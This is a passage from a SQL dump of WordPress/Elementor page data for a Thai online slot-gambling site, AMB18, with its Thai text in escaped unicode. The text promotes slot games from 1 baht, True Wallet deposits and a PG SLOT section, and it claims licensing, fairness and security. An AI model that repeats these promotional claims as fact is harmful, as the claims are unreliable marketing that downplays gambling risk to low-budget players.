\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2846,387,'_thumbnail_id','371'),(2847,387,'_elementor_edit_mode','builder'),(2848,387,'_elementor_template_type','wp-page'),(2849,387,'_elementor_version','3.35.5'),(2850,387,'_elementor_pro_version','3.32.3'),(2851,387,'_wp_page_template','default'),(2852,387,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2853,387,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17\\n\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"http:\\/\\/amb18slot.com\\\"><b>AMB18<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e02\\u0e2d\\u0e07 AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32<\\/span> <span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e08\\u0e32\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e38\\u0e48\\u0e19\\u0e27\\u0e32\\u0e22 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e08\\u0e31\\u0e14\\u0e08\\u0e49\\u0e32\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e16\\u0e35\\u0e48 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e0b\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e17\\u0e35\\u0e48\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e08\\u0e36\\u0e07\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 PG SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e02\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e04\\u0e37\\u0e2d PG SLOT \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e2d\\u0e25\\u0e31\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e21\\u0e35\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e41\\u0e25\\u0e30\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e14\\u0e38\\u0e25 